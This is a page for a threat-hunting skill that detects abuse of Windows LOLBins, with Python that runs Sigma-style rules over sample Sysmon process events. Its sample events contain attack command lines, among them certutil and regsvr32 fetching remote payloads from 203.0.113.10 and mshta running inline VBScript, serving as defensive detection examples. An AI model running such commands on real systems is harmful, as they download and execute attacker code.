Detects LOLBin/LOLBAS abuse including certutil, regsvr32, mshta, rundll32 via Sysmon telemetry, Sigma rules, and parent-child process analysis for threat hunting.
Slash command:
/cybersecurity-skills-zh:detecting-living-off-the-land-with-lolbas
Living Off The Land Binaries, Scripts and Libraries (LOLBAS) are legitimate system tools that attackers abuse to carry out malicious actions while evading detection. This skill covers detecting abuse of certutil.exe, regsvr32.exe, mshta.exe, rundll32.exe, msbuild.exe and other LOLBins using process telemetry from Sysmon and Windows event logs, combined with Sigma-rule-based detection.
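As an added illustration of the approach the summary describes (this is example code, not code from the skill or the cybersecurity-skills-zh repository), the following Python evaluates a handful of Sigma-style selections over constructed Sysmon Event ID 1 (process creation) records. It includes one parent-child rule (an Office application spawning a LOLBin) and one rule with a filter (MSBuild outside Visual Studio), and uses Sigma's default case-insensitive matching. The rule titles, the sample events and the 203.0.113.10 address are all constructed for the example.

```python
"""Toy Sigma-style matcher run over constructed Sysmon Event ID 1 records.

Added example, not part of the cybersecurity-skills-zh repository. Rules are
written in Sigma's selection syntax ("Field|modifier[|all]") and evaluated with
Sigma's default case-insensitive matching; every rule's condition is
"selection and not filter".
"""

# Constructed Sysmon Event ID 1 records; not real telemetry.
SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/payload.txt C:\Users\Public\p.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"RecordId": 2, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"RecordId": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc"":close")',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"RecordId": 4, "Image": r"C:\Windows\System32\certutil.exe",          # benign hash check
     "CommandLine": r"certutil.exe -hashfile C:\temp\installer.msi SHA256",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"RecordId": 5, "Image": r"C:\Windows\System32\rundll32.exe",          # benign control panel
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"RecordId": 6, "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": r"MSBuild.exe App.sln",                                 # developer build, filtered
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    {"RecordId": 7, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"msbuild.exe C:\Users\alice\AppData\Local\Temp\build.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Sigma-style rules: a selection (AND across fields, OR across list values) and
# an optional filter. Titles are constructed for this example.
RULES = [
    {"title": "CertUtil download or decode",
     "selection": {"Image|endswith": r"\certutil.exe",
                   "CommandLine|contains": ["urlcache", "-decode", "/decode", "-encode", "/encode"]}},
    {"title": "Regsvr32 remote scriptlet (Squiblydoo)",
     "selection": {"Image|endswith": r"\regsvr32.exe",
                   "CommandLine|contains|all": ["scrobj", "/i:"]}},
    {"title": "MSHTA inline script or remote URL",
     "selection": {"Image|endswith": r"\mshta.exe",
                   "CommandLine|contains": ["vbscript:", "javascript:", "http://", "https://"]}},
    {"title": "Rundll32 executing script",
     "selection": {"Image|endswith": r"\rundll32.exe",
                   "CommandLine|contains": ["javascript:", "vbscript:", "runhtmlapplication"]}},
    {"title": "MSBuild launched outside Visual Studio",
     "selection": {"Image|endswith": r"\msbuild.exe"},
     "filter": {"ParentImage|endswith": [r"\devenv.exe", r"\msbuild.exe"]}},
    {"title": "Office application spawning a LOLBin",            # parent-child rule
     "selection": {"ParentImage|endswith": [r"\winword.exe", r"\excel.exe", r"\powerpnt.exe", r"\outlook.exe"],
                   "Image|endswith": [r"\mshta.exe", r"\rundll32.exe", r"\regsvr32.exe", r"\certutil.exe",
                                      r"\msbuild.exe", r"\wscript.exe", r"\cscript.exe"]}},
]

_TESTS = {
    "equals": lambda value, pat: value == pat,
    "contains": lambda value, pat: pat in value,
    "startswith": lambda value, pat: value.startswith(pat),
    "endswith": lambda value, pat: value.endswith(pat),
}


def match_field(event, key, patterns):
    """Evaluate one 'Field|modifier[|all]' entry; lists OR by default, AND with |all."""
    field, *mods = key.split("|")
    value = str(event.get(field, "")).lower()
    pats = [patterns] if isinstance(patterns, str) else list(patterns)
    test = _TESTS[mods[0] if mods else "equals"]
    results = [test(value, p.lower()) for p in pats]
    return all(results) if "all" in mods[1:] else any(results)


def match_selection(event, selection):
    """Every field entry in a selection must match (Sigma AND semantics)."""
    return all(match_field(event, k, v) for k, v in selection.items())


def evaluate(event, rule):
    """Rule condition: selection and not filter."""
    if not match_selection(event, rule["selection"]):
        return False
    if rule.get("filter") and match_selection(event, rule["filter"]):
        return False
    return True


def hunt(events, rules):
    """Return (rule title, RecordId) pairs in event order, then rule order."""
    return [(r["title"], e["RecordId"]) for e in events for r in rules if evaluate(e, r)]


if __name__ == "__main__":
    for title, rid in hunt(SAMPLE_EVENTS, RULES):
        print(f"record {rid}: {title}")
```

The benign certutil hash check, the Control Panel rundll32 call and the MSBuild run parented by devenv.exe produce no hits, while the WINWORD.EXE-parented regsvr32 event fires both the Squiblydoo rule and the parent-child rule, which is the kind of corroborating second signal that makes a hunt lead worth escalating. In production the same selections would be expressed as real Sigma YAML and compiled to the SIEM's query language rather than evaluated in Python.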
Install:
npx claudepluginhub killvxk/cybersecurity-skills-zh